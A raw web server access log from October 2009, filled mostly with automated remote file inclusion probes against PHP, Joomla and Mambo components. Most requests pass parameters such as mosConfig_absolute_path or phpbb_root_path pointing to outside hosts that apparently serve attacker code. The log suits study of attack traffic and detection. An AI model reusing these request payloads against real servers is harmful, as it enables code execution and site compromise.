94.23.2.21 - - [17/Oct/2009:03:49:56 -0400] "GET /logs/access_log.Q109082500%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
66.249.71.152 - - [17/Oct/2009:03:50:08 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L017D56402999C5006EA8072+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
94.102.6.154 - - [17/Oct/2009:03:50:27 -0400] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:50:27 -0400] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:50:27 -0400] "GET /logs/access_log.Q109080200/components/com_simpleboard/image_upload.php?sbp=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:03:50:32 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:03:50:32 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.48.121.149 - - [17/Oct/2009:03:50:32 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
211.48.121.149 - - [17/Oct/2009:03:50:32 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.48.121.149 - - [17/Oct/2009:03:50:32 -0400] "GET /logs/access_log.Q109100500//admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
211.48.121.149 - - [17/Oct/2009:03:50:32 -0400] "GET /logs/access_log.Q109071700//admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:03:50:35 -0400] "GET /logs/access_log.Q109070700//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:50:36 -0400] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:50:36 -0400] "GET /logs/access_log.Q109080200/components/com_simpleboard/image_upload.php?sbp=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:50:36 -0400] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:50:41 -0400] "GET /logs/access_log.Q109062000/components/com_simpleboard/image_upload.php?sbp=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:50:49 -0400] "GET /components/com_forum/download.php?phpbb_root_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:50:49 -0400] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:50:49 -0400] "GET /logs/access_log.Q109090100/components/com_forum/download.php?phpbb_root_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:50:49 -0400] "GET /logs/access_log.Q109062000/components/com_simpleboard/image_upload.php?sbp=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:50:50 -0400] "GET /components/com_forum/download.php?phpbb_root_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:50:50 -0400] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:50:50 -0400] "GET /logs/access_log.Q109090100/components/com_forum/download.php?phpbb_root_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:50:53 -0400] "GET /logs/access_log.Q109072200/components/com_forum/download.php?phpbb_root_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:50:56 -0400] "GET /logs/access_log.Q109072200/components/com_forum/download.php?phpbb_root_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:03:50:57 -0400] "GET /logs/access_log.Q109060300//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
211.48.121.149 - - [17/Oct/2009:03:51:03 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.48.121.149 - - [17/Oct/2009:03:51:03 -0400] "GET /logs/access_log.Q109071700//admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
211.48.121.149 - - [17/Oct/2009:03:51:03 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:03:51:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.48.121.149 - - [17/Oct/2009:03:52:09 -0400] "GET /logs/access_log.Q109100500//admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:52:46 -0400] "GET /logs/access_log.Q109090100%20%20/components/com_forum/download.php?phpbb_root_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:52:46 -0400] "GET /logs/access_log.Q109072200%20%20/components/com_forum/download.php?phpbb_root_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:52:53 -0400] "GET /logs/access_log.Q109080200%20%20/components/com_simpleboard/image_upload.php?sbp=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:52:54 -0400] "GET /logs/access_log.Q109080200%20%20/components/com_simpleboard/image_upload.php?sbp=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:52:58 -0400] "GET /logs/access_log.Q109062000%20%20/components/com_simpleboard/image_upload.php?sbp=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:52:59 -0400] "GET /logs/access_log.Q109062000%20%20/components/com_simpleboard/image_upload.php?sbp=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:53:10 -0400] "GET /logs/access_log.Q109090100%20%20/components/com_forum/download.php?phpbb_root_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:53:10 -0400] "GET /logs/access_log.Q109072200%20%20/components/com_forum/download.php?phpbb_root_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:03:53:18 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:03:53:18 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:03:53:18 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.100.181.217 - - [17/Oct/2009:03:53:29 -0400] "GET /mygallerybrowser.php?myPath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
61.100.181.217 - - [17/Oct/2009:03:53:29 -0400] "GET /logs/mygallerybrowser.php?myPath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
61.100.181.217 - - [17/Oct/2009:03:53:29 -0400] "GET /logs/access_log.Q109052500/mygallerybrowser.php?myPath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:03:53:43 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:03:53:43 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:03:53:44 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:03:53:44 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:03:53:44 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:03:53:45 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:03:53:45 -0400] "GET /logs/access_log.Q109071200%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:03:53:47 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:03:53:48 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:03:53:52 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:03:53:52 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:03:53:52 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:03:53:52 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:03:53:52 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:03:53:52 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:03:53:53 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:03:53:53 -0400] "GET /logs/access_log.Q109071200%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:03:53:54 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:03:53:55 -0400] "GET /logs/access_log.Q109100400//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:03:53:57 -0400] "GET /logs/access_log.Q109100400//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:03:53:59 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:03:53:59 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:03:53:59 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:03:53:59 -0400] "GET /logs/access_log.Q109082800%20%20///?_SERVER[DOCUMENT_ROOT]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:03:53:59 -0400] "GET /logs/access_log.Q109082900%20%20///?_SERVER[DOCUMENT_ROOT]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:03:53:59 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 200 22194 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:03:53:59 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:03:54:00 -0400] "GET /logs/access_log.Q109082900///?_SERVER[DOCUMENT_ROOT]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:03:54:00 -0400] "GET /logs/access_log.Q109082800///?_SERVER[DOCUMENT_ROOT]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:03:54:00 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:03:53:59 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 200 22194 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:03:54:03 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:03:54:03 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:03:54:04 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
71.130.102.254 - - [17/Oct/2009:03:54:16 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8; MSOffice 12)"
128.125.169.162 - - [17/Oct/2009:03:54:17 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:03:54:17 -0400] "GET /logs/access_log.Q109082800%20%20///?_SERVER[DOCUMENT_ROOT]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:03:54:17 -0400] "GET /logs/access_log.Q109082900%20%20///?_SERVER[DOCUMENT_ROOT]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:03:54:17 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 200 22194 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:03:54:24 -0400] "GET /logs/access_log.Q109082900///?_SERVER[DOCUMENT_ROOT]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:03:54:24 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:03:54:24 -0400] "GET /logs/access_log.Q109082800///?_SERVER[DOCUMENT_ROOT]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:03:54:24 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 200 22194 "-" "Mozilla/5.0"
70.85.112.138 - - [17/Oct/2009:03:54:55 -0400] "GET /koesubmit.php?mosConfig_absolute_path=http://indo.home.ro/idbit??? HTTP/1.1" 404 211 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
203.229.58.122 - - [17/Oct/2009:03:54:59 -0400] "GET ///bbs///skin/ggambo7002_gallery/press.php?dir=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
203.229.58.122 - - [17/Oct/2009:03:54:59 -0400] "GET /logs///bbs///skin/ggambo7002_gallery/press.php?dir=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:03:56:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.229.58.122 - - [17/Oct/2009:03:57:05 -0400] "GET ///bbs///skin/ggambo7002_gallery/press.php?dir=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
203.229.58.122 - - [17/Oct/2009:03:57:12 -0400] "GET /logs///bbs///skin/ggambo7002_gallery/press.php?dir=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
203.229.58.122 - - [17/Oct/2009:03:57:12 -0400] "GET /logs/access_log.Q109090800%20%20///bbs///skin/ggambo7002_gallery/press.php?dir=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
211.48.121.149 - - [17/Oct/2009:03:59:00 -0400] "GET /logs/access_log.Q109071700//admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
211.48.121.149 - - [17/Oct/2009:03:59:00 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
211.48.121.149 - - [17/Oct/2009:03:59:00 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.48.121.149 - - [17/Oct/2009:04:01:10 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
211.48.121.149 - - [17/Oct/2009:04:01:10 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.48.121.149 - - [17/Oct/2009:04:01:10 -0400] "GET /logs/access_log.Q109071700%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
110.33.104.36 - - [17/Oct/2009:04:01:13 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "http://au.mg3.mail.yahoo.com/dc/blank.html?bn=182.10&.intl=us&.lang=en-AU" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
121.124.127.164 - - [17/Oct/2009:04:01:29 -0400] "GET /logs/error_log.Q109071300//?path%5Bdocroot%5D=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:04:01:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.11.145.8 - - [17/Oct/2009:04:01:59 -0400] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:04:02:00 -0400] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:04:02:00 -0400] "GET /logs/access_log.Q109070300//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:04:02:01 -0400] "GET /logs/access_log.Q109090300//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.48.121.149 - - [17/Oct/2009:04:02:02 -0400] "GET /logs/access_log.Q109100500//admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:04:02:08 -0400] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:04:02:08 -0400] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:04:02:08 -0400] "GET /logs/access_log.Q109070300%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:04:02:09 -0400] "GET /logs/access_log.Q109090300%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.100.181.217 - - [17/Oct/2009:04:02:36 -0400] "GET /logs/access_log.Q109063000/mygallerybrowser.php?myPath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:04:02:45 -0400] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:04:02:45 -0400] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:04:02:45 -0400] "GET /logs/access_log.Q109070300//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:04:02:49 -0400] "GET /logs/access_log.Q109090300//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:04:02:52 -0400] "GET /logs/access_log.Q109070300//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:04:02:52 -0400] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
